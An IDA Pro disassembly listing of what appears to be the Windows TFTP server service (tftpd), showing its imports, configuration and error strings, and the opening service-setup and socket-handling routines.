;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : DA373BD1BCC2420B09D22C702B3464CE
; File Name : u:\work\da373bd1bcc2420b09d22c702b3464ce_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 1000000
; Section 1. (virtual address 00001000)
; Virtual size : 00003310 ( 13072.)
; Section size in file : 00003400 ( 13312.)
; Offset to raw data for section: 00000600
; Flags 60000020: Text Executable Readable
; Alignment : default
;
; Imports from ADVAPI32.dll
;
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Externs
; _idata
; LSTATUS __stdcall RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult)
extrn RegOpenKeyExA:dword ; CODE XREF: sub_10037BF+20�p
; DATA XREF: sub_10037BF+20�r
; BOOL __stdcall StartServiceCtrlDispatcherA(const SERVICE_TABLE_ENTRYA *lpServiceStartTable)
extrn StartServiceCtrlDispatcherA:dword ; CODE XREF: sub_1001570+DB�p
; DATA XREF: sub_1001570+DB�r
; LSTATUS __stdcall RegQueryValueExA(HKEY hKey, LPCSTR lpValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)
extrn RegQueryValueExA:dword ; CODE XREF: sub_10037BF+64�p
; sub_10037BF+99�p ...
; LSTATUS __stdcall RegCloseKey(HKEY hKey)
extrn RegCloseKey:dword ; CODE XREF: sub_10037BF+143�p
; DATA XREF: sub_10037BF+143�r
; SERVICE_STATUS_HANDLE __stdcall RegisterServiceCtrlHandlerA(LPCSTR lpServiceName, LPHANDLER_FUNCTION lpHandlerProc)
extrn RegisterServiceCtrlHandlerA:dword ; CODE XREF: sub_1001665+4A�p
; DATA XREF: sub_1001665+4A�r
; BOOL __stdcall SetServiceStatus(SERVICE_STATUS_HANDLE hServiceStatus, LPSERVICE_STATUS lpServiceStatus)
extrn SetServiceStatus:dword ; CODE XREF: sub_1001665+6A�p
; sub_1001665+F7�p ...
;
; Imports from KERNEL32.dll
;
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: sub_1001570+ED�p
; DATA XREF: sub_1001570+ED�r
; DWORD __stdcall ExpandEnvironmentStringsA(LPCSTR lpSrc, LPSTR lpDst, DWORD nSize)
extrn ExpandEnvironmentStringsA:dword ; CODE XREF: sub_1003910+34�p
; DATA XREF: sub_1003910+34�r
; void __stdcall GetLocalTime(LPSYSTEMTIME lpSystemTime)
extrn GetLocalTime:dword ; CODE XREF: sub_1002A3D+35�p
; DATA XREF: sub_1002A3D+35�r
; void __stdcall DeleteCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn DeleteCriticalSection:dword ; CODE XREF: sub_1002901+48�p
; DATA XREF: sub_1002901+48�r
; void __stdcall SetLastError(DWORD dwErrCode)
extrn SetLastError:dword ; CODE XREF: sub_10027E1+83�p
; sub_1002F31+1C3�p ...
; BOOL __stdcall SetEvent(HANDLE hEvent)
extrn SetEvent:dword ; CODE XREF: sub_1001E73+36�p
; DATA XREF: sub_1001E73+36�r
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: HandlerProc+38�p
; sub_100741C+2D�p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword ; CODE XREF: sub_1001570+E5�p
; sub_1001665:loc_1001762�p ...
; DWORD __stdcall WaitForSingleObject(HANDLE hHandle, DWORD dwMilliseconds)
extrn WaitForSingleObject:dword ; CODE XREF: sub_1001665+210�p
; sub_1001A91+1AB�p
; DATA XREF: ...
; HANDLE __stdcall CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName)
extrn CreateEventA:dword ; CODE XREF: sub_1001665+7E�p
; sub_1001665+89�p ...
; void __stdcall InitializeCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn InitializeCriticalSection:dword ; CODE XREF: sub_10018DB+12�p
; sub_10018DB+19�p ...
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: sub_10019F0+23�p
; DATA XREF: sub_10019F0+23�r
; void __stdcall LeaveCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn LeaveCriticalSection:dword ; CODE XREF: sub_1001A1F+68�p
; sub_1001A91+B5�p ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: sub_1001A1F+58�p
; DATA XREF: sub_1001A1F+58�r
; BOOL __stdcall CloseHandle(HANDLE hObject)
extrn CloseHandle:dword ; CODE XREF: sub_1001A1F+49�p
; sub_1001E73+A9�p ...
; void __stdcall EnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn EnterCriticalSection:dword ; CODE XREF: sub_1001A1F+B�p
; sub_1001A91+4E�p ...
; LONG __stdcall InterlockedIncrement(volatile LONG *lpAddend)
extrn InterlockedIncrement:dword ; CODE XREF: sub_1001A91+27C�p
; sub_1001A91+2C1�p
; DATA XREF: ...
; DWORD __stdcall WaitForMultipleObjects(DWORD nCount, const HANDLE *lpHandles, BOOL bWaitAll, DWORD dwMilliseconds)
extrn WaitForMultipleObjects:dword ; CODE XREF: sub_1001A91+158�p
; DATA XREF: sub_1001A91+158�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: sub_1001A91+93�p
; DATA XREF: sub_1001A91+93�r
; BOOL __stdcall ResetEvent(HANDLE hEvent)
extrn ResetEvent:dword ; CODE XREF: sub_1001A91+75�p
; DATA XREF: sub_1001A91+75�r
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn Sleep:dword ; CODE XREF: .text:01001D94�p
; sub_100205A+4E�p
; DATA XREF: ...
; BOOL __stdcall TryEnterCriticalSection(LPCRITICAL_SECTION lpCriticalSection)
extrn TryEnterCriticalSection:dword ; CODE XREF: .text:01001D89�p
; .text:01001D9B�p
; DATA XREF: ...
; DWORD __stdcall SuspendThread(HANDLE hThread)
extrn SuspendThread:dword ; CODE XREF: HandlerProc+50�p
; DATA XREF: HandlerProc+50�r
;
; Imports from MSVCRT.dll
;
extrn __imp__initterm:dword ; DATA XREF: _initterm�r
extrn __getmainargs:dword ; CODE XREF: .text:01003B18�p
; DATA XREF: .text:01003B18�r
extrn __setusermatherr:dword ; CODE XREF: .text:01003AD8�p
; DATA XREF: .text:01003AD8�r
extrn _lseek:dword ; CODE XREF: sub_1002F31+1F0�p
; sub_1002F31+20A�p
; DATA XREF: ...
extrn _close:dword ; CODE XREF: sub_1002953+11�p
; DATA XREF: sub_1002953+11�r
extrn _read:dword ; CODE XREF: sub_10027E1+63�p
; DATA XREF: sub_10027E1+63�r
; void *__cdecl malloc(size_t Size)
extrn malloc:dword ; CODE XREF: sub_1001FA6+30�p
; sub_100205A+93�p ...
; void *__cdecl realloc(void *Memory, size_t NewSize)
extrn realloc:dword ; CODE XREF: sub_1001FA6+55�p
; DATA XREF: sub_1001FA6+55�r
; int __cdecl fclose(FILE *File)
extrn fclose:dword ; CODE XREF: sub_1001E73+CD�p
; DATA XREF: sub_1001E73+CD�r
; void __cdecl free(void *Memory)
extrn free:dword ; CODE XREF: sub_10018DB+75�p
; sub_1001F54+47�p ...
; time_t __cdecl time(time_t *Time)
extrn time:dword ; CODE XREF: sub_1001665+114�p
; HandlerProc+8�p
; DATA XREF: ...
extrn _chdir:dword ; CODE XREF: sub_1001665+19F�p
; sub_1001665+1BE�p
; DATA XREF: ...
; int *__cdecl errno()
extrn _errno:dword ; CODE XREF: sub_1001665+1A7�p
; sub_10027E1+7D�p ...
extrn _mkdir:dword ; CODE XREF: sub_1001665+1AE�p
; DATA XREF: sub_1001665+1AE�r
; FILE *__cdecl fopen(const char *Filename, const char *Mode)
extrn fopen:dword ; CODE XREF: sub_1001665+1DB�p
; DATA XREF: sub_1001665+1DB�r
; char *__cdecl ctime(const time_t *Time)
extrn ctime:dword ; CODE XREF: sub_1001665+1F7�p
; HandlerProc+19�p
; DATA XREF: ...
; unsigned int __cdecl _controlfp(unsigned int NewValue, unsigned int Mask)
extrn __imp__controlfp:dword ; DATA XREF: _controlfp�r
extrn _except_handler3:dword ; DATA XREF: .text:loc_1003BF0�r
extrn __set_app_type:dword ; CODE XREF: .text:01003A7F�p
; DATA XREF: .text:01003A7F�r
extrn __p__fmode:dword ; CODE XREF: .text:01003A9C�p
; DATA XREF: .text:01003A9C�r
extrn __p__commode:dword ; CODE XREF: .text:01003AAA�p
; DATA XREF: .text:01003AAA�r
extrn _adjust_fdiv:dword ; DATA XREF: .text:01003AB8�r
; int printf(const char *Format, ...)
extrn printf:dword ; CODE XREF: sub_1001570+52�p
; sub_1001570+5F�p ...
extrn __p___initenv:dword ; CODE XREF: .text:01003B33�p
; DATA XREF: .text:01003B33�r
extrn __imp__XcptFilter:dword ; DATA XREF: _XcptFilter�r
; void __cdecl exit(int Code)
extrn _exit:dword ; CODE XREF: .text:01003B7A�p
; DATA XREF: .text:01003B7A�r
extrn _open:dword ; CODE XREF: sub_1002F31+1A6�p
; sub_100333A+1B9�p
; DATA XREF: ...
extrn _write:dword ; CODE XREF: sub_100373A+5B�p
; DATA XREF: sub_100373A+5B�r
; void __cdecl exit(int Code)
extrn exit:dword ; CODE XREF: sub_1001570+CF�p
; sub_1001665+C0�p ...
;
; Imports from WS2_32.dll
;
; SOCKET __stdcall WSASocketA(int af, int type, int protocol, LPWSAPROTOCOL_INFOA lpProtocolInfo, GROUP g, DWORD dwFlags)
extrn WSASocketA:dword ; CODE XREF: sub_100205A+17�p
; DATA XREF: sub_100205A+17�r
; int __stdcall WSAGetLastError()
extrn WSAGetLastError:dword ; CODE XREF: sub_1001665+B1�p
; sub_1001A91+12B�p ...
; int __stdcall WSAStartup(WORD wVersionRequested, LPWSADATA lpWSAData)
extrn WSAStartup:dword ; CODE XREF: sub_1001665+A6�p
; DATA XREF: sub_1001665+A6�r
; int __stdcall WSAEventSelect(SOCKET s, HANDLE hEventObject, __int32 lNetworkEvents)
extrn WSAEventSelect:dword ; CODE XREF: sub_100188E+C�p
; DATA XREF: sub_100188E+C�r
; u_short __stdcall htons(u_short hostshort)
extrn htons:dword ; CODE XREF: sub_1001A91+1D2�p
; sub_100230A+18�p ...
; BOOL __stdcall WSAGetOverlappedResult(SOCKET s, LPWSAOVERLAPPED lpOverlapped, LPDWORD lpcbTransfer, BOOL fWait, LPDWORD lpdwFlags)
extrn WSAGetOverlappedResult:dword ; CODE XREF: sub_1001A91+18E�p
; DATA XREF: sub_1001A91+18E�r
; u_short __stdcall ntohs(u_short netshort)
extrn ntohs:dword ; CODE XREF: sub_1001A91+11E�p
; sub_1002A3D+40�p ...
; int __stdcall WSARecvFrom(SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesRecvd, LPDWORD lpFlags, struct sockaddr *lpFrom, LPINT lpFromlen, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine)
extrn WSARecvFrom:dword ; CODE XREF: sub_1001A91+10F�p
; DATA XREF: sub_1001A91+10F�r
; int __stdcall ioctlsocket(SOCKET s, __int32 cmd, u_long *argp)
extrn ioctlsocket:dword ; CODE XREF: sub_1001A91+2A�p
; DATA XREF: sub_1001A91+2A�r
; BOOL __stdcall WSACloseEvent(HANDLE hEvent)
extrn WSACloseEvent:dword ; CODE XREF: sub_1001F54+1C�p
; DATA XREF: sub_1001F54+1C�r
; int __stdcall closesocket(SOCKET s)
extrn closesocket:dword ; CODE XREF: sub_1001F54+13�p
; sub_100205A+E7�p ...
; char *__stdcall inet_ntoa(struct in_addr in)
extrn inet_ntoa:dword ; CODE XREF: sub_1002024+4�p
; sub_1002F31+64�p ...
; int __stdcall bind(SOCKET s, const struct sockaddr *name, int namelen)
extrn bind:dword ; CODE XREF: sub_100205A+7A�p
; sub_1002F31+256�p ...
; struct servent *__stdcall getservbyname(const char *name, const char *proto)
extrn getservbyname:dword ; CODE XREF: sub_100205A+37�p
; DATA XREF: sub_100205A+37�r
; SOCKET __stdcall socket(int af, int type, int protocol)
extrn socket:dword ; CODE XREF: sub_1002F31+22E�p
; sub_100333A+1EB�p
; DATA XREF: ...
; int __stdcall sendto(SOCKET s, const char *buf, int len, int flags, const struct sockaddr *to, int tolen)
extrn sendto:dword ; CODE XREF: sub_100230A+B6�p
; sub_1002A3D+65�p ...
;
; Imports from iphlpapi.dll
;
; DWORD __stdcall NotifyAddrChange(PHANDLE Handle, LPOVERLAPPED overlapped)
extrn __imp_NotifyAddrChange:dword ; DATA XREF: NotifyAddrChange�r
; DWORD __stdcall GetIpAddrTable(PMIB_IPADDRTABLE pIpAddrTable, PULONG pdwSize, BOOL bOrder)
extrn __imp_GetIpAddrTable:dword ; DATA XREF: GetIpAddrTable�r
;
; Imports from ntdll.dll
;
; void *__cdecl memmove(void *Dst, const void *Src, size_t Size)
extrn memmove:dword ; CODE XREF: sub_100273D+72�p
; DATA XREF: sub_100273D+72�r
; char *__cdecl strncpy(char *Dest, const char *Source, size_t Count)
extrn strncpy:dword ; CODE XREF: sub_1003910+24�p
; DATA XREF: sub_1003910+24�r
; int __cdecl isupper(int C)
extrn isupper:dword ; CODE XREF: sub_100333A+86�p
; DATA XREF: sub_100333A+86�r
; int __cdecl tolower(int C)
extrn tolower:dword ; CODE XREF: sub_1002F31+88�p
; sub_100333A+95�p
; DATA XREF: ...
extrn RtlUpdateTimer:dword ; CODE XREF: sub_1002A3D+BC�p
; sub_1002B5E+114�p ...
extrn RtlDeleteTimer:dword ; CODE XREF: sub_1002901+27�p
; sub_1002A3D+FD�p ...
; int __cdecl stricmp(const char *Str1, const char *Str2)
extrn _stricmp:dword ; CODE XREF: sub_10023D8+54�p
; sub_10023D8+C6�p ...
; int __cdecl atoi(const char *Str)
extrn atoi:dword ; CODE XREF: sub_10023D8+81�p
; sub_10023D8+F2�p
; DATA XREF: ...
; char *__cdecl itoa(int Val, char *DstBuf, int Radix)
extrn _itoa:dword ; CODE XREF: sub_10023D8:loc_1002597�p
; DATA XREF: sub_10023D8:loc_1002597�r
extrn RtlDeregisterWaitEx:dword ; CODE XREF: sub_1001F54+A�p
; sub_1002901+35�p
; DATA XREF: ...
extrn __imp__chkstk:dword ; DATA XREF: _chkstk�r
extrn RtlCreateTimerQueue:dword ; CODE XREF: sub_10018DB+81�p
; DATA XREF: sub_10018DB+81�r
extrn RtlRegisterWait:dword ; CODE XREF: sub_100188E+40�p
; sub_10018DB+D6�p
; DATA XREF: ...
extrn RtlCreateTimer:dword ; CODE XREF: sub_10018DB+A8�p
; sub_1002F31+34D�p ...
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 100117Ch
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 2 dup(0)
dd 37ECADD7h, 0
dd 4, 110h, 0
dd 4C00h, 0
dd 37ECADD7h, 0
dd 3, 310h, 0
dd 4D10h, 0
dd 37ECADD7h, 0
dd 6, 2 dup(0)
dd 5020h, 0
dd 37ECADD7h, 0
dd 2, 1Ah, 0
db 90h
db 0FEh, 0A7h, 0FFh
aDNtPrivateNetS db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999'
db ' 22:17:18',0Ah,0
; char aOWritableFiles[]
aOWritableFiles db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4�o
; char aWritable[]
aWritable db 'writable',0 ; DATA XREF: sub_1001570+BF�o
; sub_10037BF+121�o
align 4
; char aOReadableFiles[]
aOReadableFiles db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6�o
; char aReadable[]
aReadable db 'readable',0 ; DATA XREF: sub_1001570+B1�o
; sub_10037BF+F1�o
align 4
; char aOValidmastersK[]
aOValidmastersK db ' o ValidMasters keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8�o
; char aMasters[]
aMasters db 'masters',0 ; DATA XREF: sub_1001570+A3�o
; sub_10037BF+C1�o
; char aOValidclientsK[]
aOValidclientsK db ' o ValidClients keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9A�o
; char aClients[]
aClients db 'clients',0 ; DATA XREF: sub_1001570+95�o
; sub_10037BF+8E�o
; char aTheseKeysAreSh[]
aTheseKeysAreSh db 'These keys are shell patterns with * and ? (see examples above):',0Ah
; DATA XREF: sub_1001570+8D�o
db 0
align 4
; char aOStartdirector[]
aOStartdirector db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84�o
; char ValueName[]
ValueName db 'directory',0 ; DATA XREF: sub_1001570+7F�o
; sub_10037BF+5C�o
align 4
; char aRegistryKeyNam[]
aRegistryKeyNam db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0
; DATA XREF: sub_1001570+76�o
; char SubKey[]
SubKey db 'System\CurrentControlSet\Services\tftpd\parameters',0
; DATA XREF: sub_1001570+71�o
; sub_10037BF+13�o
align 10h
; char aTftpd_logfileI[]
aTftpd_logfileI db ' TFTPD_LOGFILE is %s',0Ah ; DATA XREF: sub_1001570+68�o
db 0Ah,0
align 4
; char Filename[]
Filename db 'tftpd.log',0 ; DATA XREF: sub_1001570+63�o
; sub_1001665+1D6�o
align 4
; char aTftpd_default_[]
aTftpd_default_ db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5A�o
align 4
; char Source[]
Source db '\tftpdroot\',0 ; DATA XREF: sub_1001570+55�o
; sub_1003910+1E�o
a? db '-?',0 ; DATA XREF: sub_1001570+10�o
align 4
; char Mode[]
Mode db 'a+',0 ; DATA XREF: sub_1001665+1D1�o
align 4
; char name[]
name db 'tftp',0 ; DATA XREF: sub_100205A+31�o
align 10h
; char proto[]
proto db 'udp',0 ; DATA XREF: sub_100205A+2C�o
aOptionNegotiat db 'Option negotiation failure',0 ; DATA XREF: .data:01005CE0�o
align 10h
aNoSuchUser db 'No such user',0 ; DATA XREF: .data:01005CDC�o
align 10h
aFileAlreadyExi db 'File already exists',0 ; DATA XREF: .data:01005CD8�o
aUnknownTransfe db 'Unknown transfer ID',0 ; DATA XREF: .data:01005CD4�o
aIllegalTftpOpe db 'Illegal TFTP operation',0 ; DATA XREF: .data:01005CD0�o
align 10h
aDiskFullOrAllo db 'Disk full or allocation exceeded',0 ; DATA XREF: .data:01005CCC�o
align 4
aAccessViolatio db 'Access violation',0 ; DATA XREF: .data:01005CC8�o
align 4
aFileNotFound db 'File not found',0 ; DATA XREF: .data:01005CC4�o
align 4
aErrorUndefined db 'Error undefined',0 ; DATA XREF: .data:off_1005CC0�o
; char aTsize[]
aTsize db 'tsize',0 ; DATA XREF: sub_10023D8:loc_100251A�o
align 10h
; char aTimeout_0[]
aTimeout_0 db 'timeout',0 ; DATA XREF: sub_10023D8:loc_1002498�o
; char Str2[]
Str2 db 'blksize',0 ; DATA XREF: sub_10023D8+4E�o
aTimeout db 'Timeout',0 ; DATA XREF: sub_1002A3D+D2�o
aInsufficientRe db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197�o
; sub_100333A+201�o ...
align 10h
aFileNameTooLon db 'File name too long',0 ; DATA XREF: sub_1002F31+195�o
; sub_100333A+1A0�o
align 4
aMalformedFileN db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139�o
; sub_100333A+159�o
aOctet db 'octet',0 ; DATA XREF: sub_1002F31+D2�o
; sub_100333A:loc_100341F�o
align 10h
aNetascii db 'netascii',0 ; DATA XREF: sub_1002F31+9F�o
; sub_100333A:loc_10033E1�o
align 4
asc_100155C: ; DATA XREF: sub_1003910+7F�o
unicode 0, <\>,0
dword_1001560 dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_1001570 proc near ; CODE XREF: .text:01003B4A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 1
push esi
jle loc_1001646
mov eax, [esp+4+arg_4]
mov esi, offset a? ; "-?"
mov eax, [eax+4]
loc_1001588: ; CODE XREF: sub_1001570+34�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_10015AA
test cl, cl
jz short loc_10015A6
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_10015AA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_1001588
loc_10015A6: ; CODE XREF: sub_1001570+22�j
xor eax, eax
jmp short loc_10015AF
; ---------------------------------------------------------------------------
loc_10015AA: ; CODE XREF: sub_1001570+1E�j
; sub_1001570+2C�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_10015AF: ; CODE XREF: sub_1001570+38�j
test eax, eax
jnz loc_1001646
mov esi, ds:printf
push offset Format ; " ======================================"...
call esi ; printf
pop ecx
push offset Source ; "\\tftpdroot\\"
push offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is %s\n"
call esi ; printf
pop ecx
pop ecx
push offset Filename ; "tftpd.log"
push offset aTftpd_logfileI ; " TFTPD_LOGFILE is %s\n\n"
call esi ; printf
pop ecx
pop ecx
push offset SubKey ; "System\\CurrentControlSet\\Services\\tftpd"...
push offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"...
call esi ; printf
pop ecx
pop ecx
push offset ValueName ; "directory"
push offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push offset aTheseKeysAreSh ; "These keys are shell patterns with * an"...
call esi ; printf
pop ecx
push offset aClients ; "clients"
push offset aOValidclientsK ; " o ValidClients keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push offset aMasters ; "masters"
push offset aOValidmastersK ; " o ValidMasters keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push offset aReadable ; "readable"
push offset aOReadableFiles ; " o Readable files keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push offset aWritable ; "writable"
push offset aOWritableFiles ; " o writable files keyname \"%s\"\n"
call esi ; printf
pop ecx
pop ecx
push 0FFFFFFFFh ; Code
call ds:exit ; exit
; ---------------------------------------------------------------------------
pop ecx
loc_1001646: ; CODE XREF: sub_1001570+6�j
; sub_1001570+41�j
push offset ServiceStartTable ; lpServiceStartTable
call ds:StartServiceCtrlDispatcherA ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_100165B
call ds:GetLastError
loc_100165B: ; CODE XREF: sub_1001570+E3�j
push 0 ; uExitCode
call ds:ExitProcess ; ExitProcess
sub_1001570 endp
; ---------------------------------------------------------------------------
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_1001665 proc near ; DATA XREF: .data:ServiceStartTable�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
push edi
xor ebp, ebp
push offset HandlerProc ; lpHandlerProc
push offset ServiceName ; "Tftpd"
mov ServiceStatus.dwServiceType, 30h
mov ServiceStatus.dwCurrentState, 2
mov ServiceStatus.dwControlsAccepted, ebp
mov ServiceStatus.dwCheckPoint, 1
mov ServiceStatus.dwWaitHint, 4E20h
mov ServiceStatus.dwWin32ExitCode, ebp
mov ServiceStatus.dwServiceSpecificExitCode, ebp
call ds:RegisterServiceCtrlHandlerA ; RegisterServiceCtrlHandlerA
cmp eax, ebp
mov hServiceStatus, eax
jz loc_1001762
mov esi, ds:SetServiceStatus
mov edi, offset ServiceStatus
push edi ; lpServiceStatus
push eax ; hServiceStatus
call esi ; SetServiceStatus
cmp eax, ebp
jz loc_1001762
mov ebx, ds:CreateEventA
push ebp ; lpName
push ebp ; bInitialState
push ebp ; bManualReset
push ebp ; lpEventAttributes
call ebx ; CreateEventA
push ebp ; lpName
push ebp ; bInitialState
push ebp ; bManualReset
push ebp ; lpEventAttributes
mov hHandle, eax
call ebx ; CreateEventA
cmp hHandle, ebp
mov hObject, eax
jz short loc_100171C
cmp eax, ebp
jz short loc_100171C
push offset stru_1006140 ; lpWSAData
push 101h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
cmp eax, 0FFFFFFFFh
jnz short loc_1001735
call ds:WSAGetLastError ; WSAGetLastError
loc_100171C: ; CODE XREF: sub_1001665+96�j
; sub_1001665+9A�j ...
push 1Fh
call sub_1001E73
push 1 ; Code
call ds:exit ; exit
; ---------------------------------------------------------------------------
pop ecx
loc_100172C: ; CODE XREF: sub_1001665+218�j
; sub_1001665+224�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_1001735: ; CODE XREF: sub_1001665+AF�j
push edi ; lpServiceStatus
mov ServiceStatus.dwCurrentState, 4
push hServiceStatus ; hServiceStatus
mov ServiceStatus.dwControlsAccepted, 7
mov ServiceStatus.dwCheckPoint, ebp
mov ServiceStatus.dwWaitHint, ebp
call esi ; SetServiceStatus
cmp eax, ebp
jnz short loc_100176A
loc_1001762: ; CODE XREF: sub_1001665+57�j
; sub_1001665+6E�j
call ds:GetLastError
jmp short loc_100171C
; ---------------------------------------------------------------------------
loc_100176A: ; CODE XREF: sub_1001665+FB�j
push 9
pop ecx
xor eax, eax
mov edx, offset Time
mov edi, edx
rep stosd
push edx ; Time
call ds:time ; time
pop ecx
mov edx, [esp+10h+arg_0]
dec edx
mov ebx, (offset dword_1005E07+1)
jz short loc_10017F3
mov eax, [esp+10h+arg_4]
lea eax, [eax+edx*4]
mov [esp+10h+arg_0], eax
loc_1001797: ; CODE XREF: sub_1001665+18C�j
mov eax, [esp+10h+arg_0]
mov eax, [eax]
cmp byte ptr [eax], 2Dh
jnz short loc_10017F3
movsx ecx, byte ptr [eax+1]
sub ecx, 64h
jz short loc_10017C9
dec ecx
jz short loc_10017BD
dec ecx
jnz short loc_10017E9
mov dword_1005DD8, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017BD: ; CODE XREF: sub_1001665+147�j
mov dword_1005DD4, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017C9: ; CODE XREF: sub_1001665+144�j
lea edi, [eax+2]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_10017E9: ; CODE XREF: sub_1001665+14A�j
; sub_1001665+156�j ...
sub [esp+10h+arg_0], 4
dec edx
cmp edx, ebp
ja short loc_1001797
loc_10017F3: ; CODE XREF: sub_1001665+125�j
; sub_1001665+13B�j
call sub_10037BF
call sub_1003910
mov esi, ds:_chdir
push ebx
call esi ; _chdir
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_100182E
call ds:_errno ; _errno
push ebx
call ds:_mkdir ; _mkdir
cmp eax, ebp
pop ecx
jnz loc_100171C
push ebx
call esi ; _chdir
cmp eax, ebp
pop ecx
jnz loc_100171C
loc_100182E: ; CODE XREF: sub_1001665+1A5�j
cmp dword_1005DD8, ebp
jz short loc_1001857
push offset Mode ; "a+"
push offset Filename ; "tftpd.log"
call ds:fopen ; fopen
pop ecx
cmp eax, ebp
pop ecx
mov File, eax
jnz short loc_1001857
mov dword_1005DD8, ebp
loc_1001857: ; CODE XREF: sub_1001665+1CF�j
; sub_1001665+1EA�j
push offset Time ; Time
call ds:ctime ; ctime
pop ecx
call sub_10018DB
call sub_10019F0
push 0FFFFFFFFh ; dwMilliseconds
push hHandle ; hHandle
call ds:WaitForSingleObject ; WaitForSingleObject
cmp eax, ebp
jz loc_100172C
call ds:GetLastError
jmp loc_100172C
sub_1001665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100188E(SOCKET s, HANDLE hEventObject, char)
sub_100188E proc near ; CODE XREF: sub_100205A+D5�p
; sub_1002F31+2A8�p ...
var_4 = dword ptr -4
s = dword ptr 8
hEventObject = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push 3 ; lNetworkEvents
push [ebp+hEventObject] ; hEventObject
push [ebp+s] ; s
call ds:WSAEventSelect ; WSAEventSelect
test eax, eax
jz short loc_10018AE
call ds:GetLastError
xor eax, eax
jmp short locret_10018D7
; ---------------------------------------------------------------------------
loc_10018AE: ; CODE XREF: sub_100188E+14�j
test [ebp+arg_8], 1
push 0
push 0FFFFFFFFh
push [ebp+s]
jz short loc_10018C2
push offset loc_1001D74
jmp short loc_10018C7
; ---------------------------------------------------------------------------
loc_10018C2: ; CODE XREF: sub_100188E+2B�j
push offset loc_1001DDB
loc_10018C7: ; CODE XREF: sub_100188E+32�j
push [ebp+hEventObject]
lea eax, [ebp+var_4]
push eax
call ds:RtlRegisterWait ; RtlRegisterWait
mov eax, [ebp+var_4]
locret_10018D7: ; CODE XREF: sub_100188E+1E�j
leave
retn 0Ch
sub_100188E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
